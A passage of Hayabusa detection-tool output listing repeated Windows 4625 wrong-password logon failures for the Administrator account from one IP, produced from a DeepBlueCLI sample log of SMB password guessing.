NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: 